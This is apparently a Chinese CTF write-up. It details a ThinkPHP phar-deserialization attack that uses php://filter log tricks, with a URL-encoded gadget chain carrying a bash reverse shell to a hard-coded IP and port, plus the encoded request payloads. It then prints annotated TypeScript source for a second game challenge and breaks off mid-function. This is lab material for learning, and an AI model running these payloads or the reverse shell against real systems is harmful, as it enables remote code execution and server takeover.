Web
easy_filter
跟国赛那个题很像,就是log文件的格式不大一样,改一改就好
用的RCEpayload:
https://www.freebuf.com/vuls/269882.html
生成phar:
<?php
// Builds phar.phar whose manifest metadata is the serialised object graph in $a.
// PHP unserialises phar metadata when the archive is opened through the phar://
// stream wrapper (plain file functions such as file_get_contents() suffice), which is
// why a log file that later contains these bytes is enough to reach unserialize() —
// the root cause this writeup exploits. Defensively: never let a user-controlled path
// reach the phar:// wrapper; PHP 8.0+ no longer parses metadata automatically on open
// (confirm for the target version).
// $a is a ThinkPHP gadget chain (think\process\pipes\Windows -> think\model\Pivot) whose
// data entry is a reverse-shell command aimed at the author's listener; decode the
// URL-encoded string to see it. The listener address is an IoC for this sample.
$a = unserialize(urldecode("O%3A27%3A%22think%5Cprocess%5Cpipes%5CWindows%22%3A1%3A%7Bs%3A34%3A%22%00think%5Cprocess%5Cpipes%5CWindows%00files%22%3Ba%3A1%3A%7Bi%3A0%3BO%3A17%3A%22think%5Cmodel%5CPivot%22%3A4%3A%7Bs%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bs%3A6%3A%224ut15m%22%3Bs%3A54%3A%22bash+-c+%27bash+-i+%3E%26+%2Fdev%2Ftcp%2F47.104.134.135%2F2333+0%3E%261%27%22%3B%7Ds%3A21%3A%22%00think%5CModel%00withAttr%22%3Ba%3A1%3A%7Bs%3A6%3A%224ut15m%22%3Bs%3A6%3A%22system%22%3B%7Ds%3A9%3A%22%00%2A%00append%22%3Ba%3A1%3A%7Bs%3A6%3A%224ut15m%22%3Ba%3A0%3A%7B%7D%7Ds%3A8%3A%22relation%22%3Bb%3A0%3B%7D%7D%7D"));
$phar = new Phar("phar.phar"); // the file extension must be .phar for the Phar class to create it
$phar->startBuffering(); // defer writes until stopBuffering() so the archive is written once
$phar->setStub("<?php __HALT_COMPILER(); ?>"); // minimal stub; the archive body follows it
$phar->setMetadata($a); // the custom object graph is stored serialised in the manifest
$phar->addFromString("test.txt", "test"); // at least one entry is required for a valid archive
// the signature is computed automatically
$phar->stopBuffering();
对phar进行编码
注意这里生成的payload每行结尾有多余的换行符和=,去除一下,然后把+编码成%2b
P=00D=009=00w=00a=00H=00A=00g=00X=001=009=00I=00Q=00U=00x=00U=00X=000=00N=00P=00T=00V=00B=00J=00T=00E=00V=00S=00K=00C=00k=007=00I=00D=008=00%2b=00D=00Q=00p=00c=00A=00Q=00A=00A=00A=00Q=00A=00A=00A=00B=00E=00A=00A=00A=00A=00B=00A=00A=00A=00A=00A=00A=00A=00m=00A=00Q=00A=00A=00T=00z=00o=00y=00N=00z=00o=00i=00d=00G=00h=00p=00b=00m=00t=00c=00c=00H=00J=00v=00Y=002=00V=00z=00c=001=00x=00w=00a=00X=00B=00l=00c=001=00x=00X=00a=00W=005=00k=00b=003=00d=00z=00I=00j=00o=00x=00O=00n=00t=00z=00O=00j=00M=000=00O=00i=00I=00A=00d=00G=00h=00p=00b=00m=00t=00c=00c=00H=00J=00v=00Y=002=00V=00z=00c=001=00x=00w=00a=00X=00B=00l=00c=001=00x=00X=00a=00W=005=00k=00b=003=00d=00z=00A=00G=00Z=00p=00b=00G=00V=00z=00I=00j=00t=00h=00O=00j=00E=006=00e=002=00k=006=00M=00D=00t=00P=00O=00j=00E=003=00O=00i=00J=000=00a=00G=00l=00u=00a=001=00x=00t=00b=002=00R=00l=00b=00F=00x=00Q=00a=00X=00Z=00v=00d=00C=00I=006=00N=00D=00p=007=00c=00z=00o=00x=00N=00z=00o=00i=00A=00H=00R=00o=00a=00W=005=00r=00X=00E=001=00v=00Z=00G=00V=00s=00A=00G=00R=00h=00d=00G=00E=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=003=00M=006=00M=00j=00o=00i=00a=00W=00Q=00i=00O=003=001=00z=00O=00j=00I=00x=00O=00i=00I=00A=00d=00G=00h=00p=00b=00m=00t=00c=00T=00W=009=00k=00Z=00W=00w=00A=00d=002=00l=000=00a=00E=00F=000=00d=00H=00I=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=003=00M=006=00N=00j=00o=00i=00c=003=00l=00z=00d=00G=00V=00t=00I=00j=00t=009=00c=00z=00o=005=00O=00i=00I=00A=00K=00g=00B=00h=00c=00H=00B=00l=00b=00m=00Q=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=002=00E=006=00M=00D=00p=007=00f=00X=001=00z=00O=00j=00g=006=00I=00n=00J=00l=00b=00G=00F=000=00a=00W=009=00u=00I=00j=00t=00i=00O=00j=00A=007=00f=00X=001=009=00C=00A=00A=00A=00A=00H=00R=00l=00c=003=00Q=00u=00d=00H=00h=000=00B=00A=00A=00A=00A=00K=00P=00o=00s=00W=00A=00E=00A=00A=00A=00A=00D=00H=005=00/=002=00L=00Y=00B=
00A=00A=00A=00A=00A=00A=00A=00A=00d=00G=00V=00z=00d=00A=00D=00n=00j=00D=00c=00f=00a=00/=00o=00V=00n=00K=00P=00s=00m=00j=00S=00D=00S=00L=00M=00E=00K=00V=00c=00J=00A=00g=00A=00A=00A=00E=00d=00C=00T=00U=00I=00=3D=00
thinkphp的日志文件在runtime/log/202105/29.log,下一步就是在本地调试下,尝试如何去掉多余的字符,只将我们的payload解码成phar文件
先清空日志:
index.php?s=/index/Index/hello&file=php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=/var/www/html/runtime/log/202105/29.log
为了防止多余的等号影响payload的解析,我们这样传参index.php/index/Index/hello?file=
写入我们刚才生成的payload
index.php/index/Index/hello?file=P=00D=009=00w=00a=00H=00A=00g=00X=001=009=00I=00Q=00U=00x=00U=00X=000=00N=00P=00T=00V=00B=00J=00T=00E=00V=00S=00K=00C=00k=007=00I=00D=008=00%2b=00D=00Q=00p=00c=00A=00Q=00A=00A=00A=00Q=00A=00A=00A=00B=00E=00A=00A=00A=00A=00B=00A=00A=00A=00A=00A=00A=00A=00m=00A=00Q=00A=00A=00T=00z=00o=00y=00N=00z=00o=00i=00d=00G=00h=00p=00b=00m=00t=00c=00c=00H=00J=00v=00Y=002=00V=00z=00c=001=00x=00w=00a=00X=00B=00l=00c=001=00x=00X=00a=00W=005=00k=00b=003=00d=00z=00I=00j=00o=00x=00O=00n=00t=00z=00O=00j=00M=000=00O=00i=00I=00A=00d=00G=00h=00p=00b=00m=00t=00c=00c=00H=00J=00v=00Y=002=00V=00z=00c=001=00x=00w=00a=00X=00B=00l=00c=001=00x=00X=00a=00W=005=00k=00b=003=00d=00z=00A=00G=00Z=00p=00b=00G=00V=00z=00I=00j=00t=00h=00O=00j=00E=006=00e=002=00k=006=00M=00D=00t=00P=00O=00j=00E=003=00O=00i=00J=000=00a=00G=00l=00u=00a=001=00x=00t=00b=002=00R=00l=00b=00F=00x=00Q=00a=00X=00Z=00v=00d=00C=00I=006=00N=00D=00p=007=00c=00z=00o=00x=00N=00z=00o=00i=00A=00H=00R=00o=00a=00W=005=00r=00X=00E=001=00v=00Z=00G=00V=00s=00A=00G=00R=00h=00d=00G=00E=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=003=00M=006=00M=00j=00o=00i=00a=00W=00Q=00i=00O=003=001=00z=00O=00j=00I=00x=00O=00i=00I=00A=00d=00G=00h=00p=00b=00m=00t=00c=00T=00W=009=00k=00Z=00W=00w=00A=00d=002=00l=000=00a=00E=00F=000=00d=00H=00I=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=003=00M=006=00N=00j=00o=00i=00c=003=00l=00z=00d=00G=00V=00t=00I=00j=00t=009=00c=00z=00o=005=00O=00i=00I=00A=00K=00g=00B=00h=00c=00H=00B=00l=00b=00m=00Q=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=002=00E=006=00M=00D=00p=007=00f=00X=001=00z=00O=00j=00g=006=00I=00n=00J=00l=00b=00G=00F=000=00a=00W=009=00u=00I=00j=00t=00i=00O=00j=00A=007=00f=00X=001=009=00C=00A=00A=00A=00A=00H=00R=00l=00c=003=00Q=00u=00d=00H=00h=000=00B=00A=00A=00A=00A=00K=00P=00o=00s=00W=00A=00E=00A=00A=00A=00A
=00D=00H=005=00/=002=00L=00Y=00B=00A=00A=00A=00A=00A=00A=00A=00A=00d=00G=00V=00z=00d=00A=00D=00n=00j=00D=00c=00f=00a=00/=00o=00V=00n=00K=00P=00s=00m=00j=00S=00D=00S=00L=00M=00E=00K=00V=00c=00J=00A=00g=00A=00A=00A=00E=00d=00C=00T=00U=00I=00=3D=00
生成了如下格式的日志:
---------------------------------------------------------------
[2021-05-29T15:16:44+08:00] 127.0.0.1 GET 127.0.0.1/index.php/index/Index/hello?file=P=00D=009=00w=00a=00H=00A=00g=00X=001=009=00I=00Q=00U=00x=00U=00X=000=00N=00P=00T=00V=00B=00J=00T=00E=00V=00S=00K=00C=00k=007=00I=00D=008=00%2b=00D=00Q=00p=00c=00A=00Q=00A=00A=00A=00Q=00A=00A=00A=00B=00E=00A=00A=00A=00A=00B=00A=00A=00A=00A=00A=00A=00A=00m=00A=00Q=00A=00A=00T=00z=00o=00y=00N=00z=00o=00i=00d=00G=00h=00p=00b=00m=00t=00c=00c=00H=00J=00v=00Y=002=00V=00z=00c=001=00x=00w=00a=00X=00B=00l=00c=001=00x=00X=00a=00W=005=00k=00b=003=00d=00z=00I=00j=00o=00x=00O=00n=00t=00z=00O=00j=00M=000=00O=00i=00I=00A=00d=00G=00h=00p=00b=00m=00t=00c=00c=00H=00J=00v=00Y=002=00V=00z=00c=001=00x=00w=00a=00X=00B=00l=00c=001=00x=00X=00a=00W=005=00k=00b=003=00d=00z=00A=00G=00Z=00p=00b=00G=00V=00z=00I=00j=00t=00h=00O=00j=00E=006=00e=002=00k=006=00M=00D=00t=00P=00O=00j=00E=003=00O=00i=00J=000=00a=00G=00l=00u=00a=001=00x=00t=00b=002=00R=00l=00b=00F=00x=00Q=00a=00X=00Z=00v=00d=00C=00I=006=00N=00D=00p=007=00c=00z=00o=00x=00N=00z=00o=00i=00A=00H=00R=00o=00a=00W=005=00r=00X=00E=001=00v=00Z=00G=00V=00s=00A=00G=00R=00h=00d=00G=00E=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=003=00M=006=00M=00j=00o=00i=00a=00W=00Q=00i=00O=003=001=00z=00O=00j=00I=00x=00O=00i=00I=00A=00d=00G=00h=00p=00b=00m=00t=00c=00T=00W=009=00k=00Z=00W=00w=00A=00d=002=00l=000=00a=00E=00F=000=00d=00H=00I=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=003=00M=006=00N=00j=00o=00i=00c=003=00l=00z=00d=00G=00V=00t=00I=00j=00t=009=00c=00z=00o=005=00O=00i=00I=00A=00K=00g=00B=00h=00c=00H=00B=00l=00b=00m=00Q=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=002=00E=006=00M=00D=00p=007=00f=00X=001=00z=00O=00j=00g=006=00I=00n=00J=00l=00b=00G=00F=000=00a=00W=009=00u=00I=00j=00t=00i=00O=00j=00A=007=00f=00X=001=009=00C=00A=00A=00A=00A=00H=00R=00l=00c=003=00Q=00u=00d=00H=00h=000=00B=00A=00A
=00A=00A=00K=00P=00o=00s=00W=00A=00E=00A=00A=00A=00A=00D=00H=005=00/=002=00L=00Y=00B=00A=00A=00A=00A=00A=00A=00A=00A=00d=00G=00V=00z=00d=00A=00D=00n=00j=00D=00c=00f=00a=00/=00o=00V=00n=00K=00P=00s=00m=00j=00S=00D=00S=00L=00M=00E=00K=00V=00c=00J=00A=00g=00A=00A=00A=00E=00d=00C=00T=00U=00I=00=3D=00
[ error ] [2]file_get_contents(P=00D=009=00w=00a=00H=00A=00g=00X=001=009=00I=00Q=00U=00x=00U=00X=000=00N=00P=00T=00V=00B=00J=00T=00E=00V=00S=00K=00C=00k=007=00I=00D=008=00+=00D=00Q=00p=00c=00A=00Q=00A=00A=00A=00Q=00A=00A=00A=00B=00E=00A=00A=00A=00A=00B=00A=00A=00A=00A=00A=00A=00A=00m=00A=00Q=00A=00A=00T=00z=00o=00y=00N=00z=00o=00i=00d=00G=00h=00p=00b=00m=00t=00c=00c=00H=00J=00v=00Y=002=00V=00z=00c=001=00x=00w=00a=00X=00B=00l=00c=001=00x=00X=00a=00W=005=00k=00b=003=00d=00z=00I=00j=00o=00x=00O=00n=00t=00z=00O=00j=00M=000=00O=00i=00I=00A=00d=00G=00h=00p=00b=00m=00t=00c=00c=00H=00J=00v=00Y=002=00V=00z=00c=001=00x=00w=00a=00X=00B=00l=00c=001=00x=00X=00a=00W=005=00k=00b=003=00d=00z=00A=00G=00Z=00p=00b=00G=00V=00z=00I=00j=00t=00h=00O=00j=00E=006=00e=002=00k=006=00M=00D=00t=00P=00O=00j=00E=003=00O=00i=00J=000=00a=00G=00l=00u=00a=001=00x=00t=00b=002=00R=00l=00b=00F=00x=00Q=00a=00X=00Z=00v=00d=00C=00I=006=00N=00D=00p=007=00c=00z=00o=00x=00N=00z=00o=00i=00A=00H=00R=00o=00a=00W=005=00r=00X=00E=001=00v=00Z=00G=00V=00s=00A=00G=00R=00h=00d=00G=00E=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=003=00M=006=00M=00j=00o=00i=00a=00W=00Q=00i=00O=003=001=00z=00O=00j=00I=00x=00O=00i=00I=00A=00d=00G=00h=00p=00b=00m=00t=00c=00T=00W=009=00k=00Z=00W=00w=00A=00d=002=00l=000=00a=00E=00F=000=00d=00H=00I=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=003=00M=006=00N=00j=00o=00i=00c=003=00l=00z=00d=00G=00V=00t=00I=00j=00t=009=00c=00z=00o=005=00O=00i=00I=00A=00K=00g=00B=00h=00c=00H=00B=00l=00b=00m=00Q=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=002=00E=006=00M=00D=00p=007=00f=00X=001=00z=00O=00j=00g=006=00I=00n=00J=00l=00b=00G=00F=000=00a=00W=009=00u=00I=00j=00t=00i=00O=00j=00A=007=00f=00X=001=009=00C=00A=00A=00A=00A=00H=00R=00l=00c=003=00Q=00u=00d=00H=00h=000=00B=00A=00A=00A=00A=00K=00P=00o=00s=00W=00A=00E=00A=00A=00A=00A=00D
=00H=005=00/=002=00L=00Y=00B=00A=00A=00A=00A=00A=00A=00A=00A=00d=00G=00V=00z=00d=00A=00D=00n=00j=00D=00c=00f=00a=00/=00o=00V=00n=00K=00P=00s=00m=00j=00S=00D=00S=00L=00M=00E=00K=00V=00c=00J=00A=00g=00A=00A=00A=00E=00d=00C=00T=00U=00I=00=3D=00): failed to open stream: File name too long
经过尝试,将payload修改成如下格式即可正常解码:
payload开头加入俩数字来使得前面的=正常解码,结尾加上a使得最终只出现一个payload
50P=00D=009=00w=00a=00H=00A=00g=00X=001=009=00I=00Q=00U=00x=00U=00X=000=00N=00P=00T=00V=00B=00J=00T=00E=00V=00S=00K=00C=00k=007=00I=00D=008=00%2b=00D=00Q=00p=00c=00A=00Q=00A=00A=00A=00Q=00A=00A=00A=00B=00E=00A=00A=00A=00A=00B=00A=00A=00A=00A=00A=00A=00A=00m=00A=00Q=00A=00A=00T=00z=00o=00y=00N=00z=00o=00i=00d=00G=00h=00p=00b=00m=00t=00c=00c=00H=00J=00v=00Y=002=00V=00z=00c=001=00x=00w=00a=00X=00B=00l=00c=001=00x=00X=00a=00W=005=00k=00b=003=00d=00z=00I=00j=00o=00x=00O=00n=00t=00z=00O=00j=00M=000=00O=00i=00I=00A=00d=00G=00h=00p=00b=00m=00t=00c=00c=00H=00J=00v=00Y=002=00V=00z=00c=001=00x=00w=00a=00X=00B=00l=00c=001=00x=00X=00a=00W=005=00k=00b=003=00d=00z=00A=00G=00Z=00p=00b=00G=00V=00z=00I=00j=00t=00h=00O=00j=00E=006=00e=002=00k=006=00M=00D=00t=00P=00O=00j=00E=003=00O=00i=00J=000=00a=00G=00l=00u=00a=001=00x=00t=00b=002=00R=00l=00b=00F=00x=00Q=00a=00X=00Z=00v=00d=00C=00I=006=00N=00D=00p=007=00c=00z=00o=00x=00N=00z=00o=00i=00A=00H=00R=00o=00a=00W=005=00r=00X=00E=001=00v=00Z=00G=00V=00s=00A=00G=00R=00h=00d=00G=00E=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=003=00M=006=00M=00j=00o=00i=00a=00W=00Q=00i=00O=003=001=00z=00O=00j=00I=00x=00O=00i=00I=00A=00d=00G=00h=00p=00b=00m=00t=00c=00T=00W=009=00k=00Z=00W=00w=00A=00d=002=00l=000=00a=00E=00F=000=00d=00H=00I=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=003=00M=006=00N=00j=00o=00i=00c=003=00l=00z=00d=00G=00V=00t=00I=00j=00t=009=00c=00z=00o=005=00O=00i=00I=00A=00K=00g=00B=00h=00c=00H=00B=00l=00b=00m=00Q=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=002=00E=006=00M=00D=00p=007=00f=00X=001=00z=00O=00j=00g=006=00I=00n=00J=00l=00b=00G=00F=000=00a=00W=009=00u=00I=00j=00t=00i=00O=00j=00A=007=00f=00X=001=009=00C=00A=00A=00A=00A=00H=00R=00l=00c=003=00Q=00u=00d=00H=00h=000=00B=00A=00A=00A=00A=00P=00n=00U=00s=00W=00A=00E=00A=00A=00A=00A=00D=00H=005=00/=002=00L=00Y=00
B=00A=00A=00A=00A=00A=00A=00A=00A=00d=00G=00V=00z=00d=00C=00X=00V=00Z=00K=00W=00D=00l=00R=00w=00s=00R=00A=00g=003=00p=001=001=008=00O=00N=00k=002=00U=00P=00O=00w=00A=00g=00A=00A=00A=00E=00d=00C=00T=00U=00I=00=3D=00a
再清空,发送payload
解码
index.php?s=/index/Index/hello&file=php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=/var/www/html/runtime/log/202105/29.log
触发
成功执行,接下来就把命令改成tac /flag就好了
http://eci-2zegz186wmvgj36lmnge.cloudeci1.ichunqiu.com/index.php/index/Index/hello?file=50P=00D=009=00w=00a=00H=00A=00g=00X=001=009=00I=00Q=00U=00x=00U=00X=000=00N=00P=00T=00V=00B=00J=00T=00E=00V=00S=00K=00C=00k=007=00I=00D=008=00%2b=00D=00Q=00p=00j=00A=00Q=00A=00A=00A=00Q=00A=00A=00A=00B=00E=00A=00A=00A=00A=00B=00A=00A=00A=00A=00A=00A=00A=00t=00A=00Q=00A=00A=00T=00z=00o=00y=00N=00z=00o=00i=00d=00G=00h=00p=00b=00m=00t=00c=00c=00H=00J=00v=00Y=002=00V=00z=00c=001=00x=00w=00a=00X=00B=00l=00c=001=00x=00X=00a=00W=005=00k=00b=003=00d=00z=00I=00j=00o=00x=00O=00n=00t=00z=00O=00j=00M=000=00O=00i=00I=00A=00d=00G=00h=00p=00b=00m=00t=00c=00c=00H=00J=00v=00Y=002=00V=00z=00c=001=00x=00w=00a=00X=00B=00l=00c=001=00x=00X=00a=00W=005=00k=00b=003=00d=00z=00A=00G=00Z=00p=00b=00G=00V=00z=00I=00j=00t=00h=00O=00j=00E=006=00e=002=00k=006=00M=00D=00t=00P=00O=00j=00E=003=00O=00i=00J=000=00a=00G=00l=00u=00a=001=00x=00t=00b=002=00R=00l=00b=00F=00x=00Q=00a=00X=00Z=00v=00d=00C=00I=006=00N=00D=00p=007=00c=00z=00o=00x=00N=00z=00o=00i=00A=00H=00R=00o=00a=00W=005=00r=00X=00E=001=00v=00Z=00G=00V=00s=00A=00G=00R=00h=00d=00G=00E=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=003=00M=006=00O=00T=00o=00i=00d=00G=00F=00j=00I=00C=009=00m=00b=00G=00F=00n=00I=00j=00t=009=00c=00z=00o=00y=00M=00T=00o=00i=00A=00H=00R=00o=00a=00W=005=00r=00X=00E=001=00v=00Z=00G=00V=00s=00A=00H=00d=00p=00d=00G=00h=00B=00d=00H=00R=00y=00I=00j=00t=00h=00O=00j=00E=006=00e=003=00M=006=00N=00j=00o=00i=00N=00H=00V=000=00M=00T=00V=00t=00I=00j=00t=00z=00O=00j=00Y=006=00I=00n=00N=005=00c=003=00R=00l=00b=00S=00I=007=00f=00X=00M=006=00O=00T=00o=00i=00A=00C=00o=00A=00Y=00X=00B=00w=00Z=00W=005=00k=00I=00j=00t=00h=00O=00j=00E=006=00e=003=00M=006=00N=00j=00o=00i=00N=00H=00V=000=00M=00T=00V=00t=00I=00j=00t=00h=00O=00j=00A=006=00e=003=001=009=00c=00z=00o=004=00O=00i=00J=00y=00Z=00W=00x=00h=00d=00G=00l=00v=00b=00i=00I=007=00Y=00j=00o=00w=00O=003=001=009=00f=00Q=00g=00A=00A=00A=00B=000=00Z=00
X=00N=000=00L=00n=00R=004=00d=00A=00Q=00A=00A=00A=00B=009=007=00L=00F=00g=00B=00A=00A=00A=00A=00A=00x=00%2b=00f=009=00i=002=00A=00Q=00A=00A=00A=00A=00A=00A=00A=00H=00R=00l=00c=003=00Q=00p=006=00T=00n=00c=00B=00R=00c=007=00o=00Z=00V=00i=00m=00m=005=00n=00c=00l=00W=00t=00J=00y=00W=00w=007=00Q=00I=00A=00A=00A=00B=00H=00Q=00k=001=00C=00a
也可以弹shell
ctftaker
/source
有源码
import { createHash, randomBytes } from "crypto";
import { readFileSync } from "fs";
import { resolve } from "path";
import { exit } from "process";
import cookieSession from "cookie-session";
import express from "express";
import { SessionData } from "express-session";
import * as CONST from "./const";
// Augments express-session's SessionData with the fields this app keeps in the
// cookie-session (the whole object travels in the signed session cookie).
declare module "express-session" {
    interface SessionData {
        history: string[];        // accumulated log lines, returned by /his
        monster: SerializedObj[]; // remaining opponents; element 0 is the next one to fight
        player: SerializedObj;    // the player's serialised stats
        coin: number;             // currency spent through /levelup
        init: boolean;            // false until initSession() has populated the fields above
    }
}
// Plain-data form of Obj as produced by Obj.serialize(); this is what is stored in the session.
interface SerializedObj {
    ATK: number;
    DEF: number;
    HP: number;
    factor: number; // growth level; the stats are rolled from it when not given explicitly
    name: string;
}
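/**
 * A combatant (the player or a monster). Stats are plain numbers so the object
 * survives the JSON round-trip through the session via serialize()/deserialzie().
 */
class Obj {
    ATK: number;
    DEF: number;
    HP: number;
    factor: number;

    /**
     * @param name   shown in fight log lines
     * @param factor growth level; coerced with parseInt, so "12abc" becomes 12 and a
     *               non-numeric value becomes NaN — callers must validate before passing it
     * @param ATK,DEF,HP explicit stats; when omitted each is drawn from [0, factor)
     */
    constructor(readonly name: string, factor: number|string, ATK?: number, DEF?: number, HP?: number) {
        this.factor = factor = parseInt(`${factor}`);
        this.ATK = ATK ?? factor * Math.random();
        this.DEF = DEF ?? factor * Math.random();
        this.HP = HP ?? factor * Math.random();
    }

    /** Adds `factor` (parseInt-coerced, see constructor) to the level and re-rolls all three stats. */
    levepup(factor: number|string) {
        this.factor = factor = this.factor + parseInt(`${factor}`);
        this.ATK = factor * Math.random();
        this.DEF = factor * Math.random();
        this.HP = factor * Math.random();
    }

    /**
     * Simulates a duel: this attacks first, then obj, until one side's HP is clamped to 0.
     * Damage per hit is attacker ATK minus defender DEF and is not clamped, so a
     * non-positive value leaves (or raises) the target's HP.
     * @returns [true if this survived, the log lines of the duel]
     */
    fight(obj: Obj): [boolean, string[]] {
        const his: string[] = [`${this.name}向${obj.name}发起了对战!`];
        let selfHp = this.HP;
        let objHp = obj.HP;
        his.push(`${this.name} HP:${selfHp};${obj.name} HP:${objHp}`);
        // If neither side can ever bring the other to 0 (no positive damage, or an
        // infinite/NaN HP), the original loop never terminated and stalled the
        // single-threaded server for every client. Treat that as a loss for the attacker.
        const selfDmg = this.ATK - obj.DEF;
        const objDmg = obj.ATK - this.DEF;
        const canEnd = (Number.isFinite(objHp) && selfDmg > 0) || (Number.isFinite(selfHp) && objDmg > 0);
        if (!canEnd) {
            his.push(`${this.name}与${obj.name}都无法造成伤害,对战无法进行!`);
            return [false, his];
        }
        while (true) {
            objHp -= selfDmg;
            objHp = Math.max(objHp, 0);
            his.push(`${this.name}向${obj.name}发起攻击!`);
            his.push(`${this.name} HP:${selfHp};${obj.name} HP:${objHp}`);
            if (objHp === 0) break;
            selfHp -= objDmg;
            selfHp = Math.max(selfHp, 0);
            his.push(`${obj.name}向${this.name}发起攻击!`);
            his.push(`${this.name} HP:${selfHp};${obj.name} HP:${objHp}`);
            if (selfHp === 0) break;
        }
        return [selfHp > 0, his];
    }

    /** Plain-data copy suitable for storing in the session. */
    static serialize(obj: Obj): SerializedObj {
        return {
            ATK: obj.ATK,
            DEF: obj.DEF,
            HP: obj.HP,
            factor: obj.factor,
            name: obj.name,
        };
    }

    /** Inverse of serialize(); name kept as-is (typo) because route handlers call it. */
    static deserialzie(obj: SerializedObj): Obj {
        return new Obj(obj.name, obj.factor, obj.ATK, obj.DEF, obj.HP);
    }
}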
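const app = express();
app.use(express.static(resolve("static")));
app.use(express.json());
app.use(express.urlencoded({extended: true}));
// Key that signs every client-side session cookie. The original derived it as
// md5(Math.random()): Math.random() is not a CSPRNG and hashing adds no entropy, so the
// key was guessable in principle. Draw it from the OS CSPRNG instead (randomBytes is
// imported from "crypto" next to createHash). It is deliberately not logged: printing
// the signing key to stdout hands it to anyone who can read the process output.
const secret = randomBytes(32).toString("hex");
app.use(cookieSession({
    secret: secret,
    name: "session",
}));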
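/**
 * Populates a fresh session (init === false) with the starting state.
 * Always returns true; the `session is SessionData` predicate exists so route handlers
 * can narrow req.session with `if(!initSession(req.session)) return;`.
 */
function initSession(session: any): session is SessionData {
    if (!session.init) {
        session.history = [];
        // Store the serialised form, as the monsters are, so every Obj.deserialzie()
        // call site reads the same plain shape (the original stored a live Obj here).
        session.player = Obj.serialize(new Obj("Player", 0));
        session.coin = 1;
        session.init = true;
        // Opponents in fight order, each with its growth factor.
        const roster: [string, number][] = [
            ["BabyCalc", 1],
            ["MediumCalc", 2],
            ["HardCalc", 5],
            ["GodCalc", 10],
            ["ImpossibleCalc", 100],
            ["TotalImpossibleCalc", 1000],
            ["????????Calc", 10000],
        ];
        session.monster = roster.map(([name, factor]) => Obj.serialize(new Obj(name, factor)));
    }
    return true;
}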
// Runs before every route so a first-time visitor's session is populated.
app.use(function (req, res, next) {
    initSession(req.session);
    next();
});
// Returns the accumulated log lines of this session.
app.get("/his", function (req, res) {
    if (!initSession(req.session)) return;
    const lines = req.session.history;
    // NOTE(review): "n" here reads like a "\n" lost in extraction — confirm against the original.
    const message = lines.join("n");
    res.send({message});
});
// Appends the banner to the session log and returns it.
app.get("/start", function (req, res) {
    if (!initSession(req.session)) return;
    const banner = CONST.banner;
    req.session.history = [...req.session.history, ...banner];
    res.send({message: banner.join("n")});
});
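// Spends `f` coins to raise the player's level by `f`.
app.post("/levelup", (req, res) => {
    if (!initSession(req.session)) return;
    const {f} = req.body;
    // Coerce before comparing. The original compared the raw body value with `f > coin`,
    // which for a string such as "9999999/0" is NaN > coin === false, so the request
    // passed and parseInt() inside levepup() later turned it into 9999999 — the unbounded
    // level-up this writeup exploits. Accept only a positive integer coin count.
    const spend = (typeof f === "number" || typeof f === "string") ? Number(f) : NaN;
    if (!Number.isInteger(spend) || spend <= 0 || spend > req.session.coin) {
        return res.send({message: "不大对呢"});
    }
    const player = Obj.deserialzie(req.session.player);
    // Check the cap before charging so a refused level-up does not consume coins
    // (the original deducted first and then bailed out).
    if (player.factor > 50) {
        return res.send({message: "你太强了,寻找更多的机遇吧"});
    }
    req.session.coin -= spend;
    player.levepup(spend);
    req.session.player = Obj.serialize(player);
    // NOTE(review): split("n")/join("n") read like "\n" lost in extraction — confirm against the original.
    const msg = `${player.name}使用了${spend}枚硬币升级了自己
现在的状态:ATK:${player.ATK},DEF:${player.DEF},HP:${player.HP},COIN:${req.session.coin}枚,还剩${req.session.monster.length}个题`.split("n");
    req.session.history = req.session.history.concat(msg);
    res.send({message: msg.join("n")});
});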
// Describes the next opponent, or the footer once the list is exhausted.
app.get("/monster", function (req, res) {
    if (!initSession(req.session)) return;
    const remaining = req.session.monster;
    if (remaining.length === 0) {
        return res.send({message: CONST.footer.join("n")});
    }
    const next = Obj.deserialzie(remaining[0]);
    const message = `${next.name}出现了!ATK:${next.ATK},DEF:${next.DEF},HP:${next.HP}`;
    res.send({message});
});
// Reports the player's current stats, coins and remaining opponents.
app.get("/status", function (req, res) {
    if (!initSession(req.session)) return;
    const session = req.session;
    const self = Obj.deserialzie(session.player);
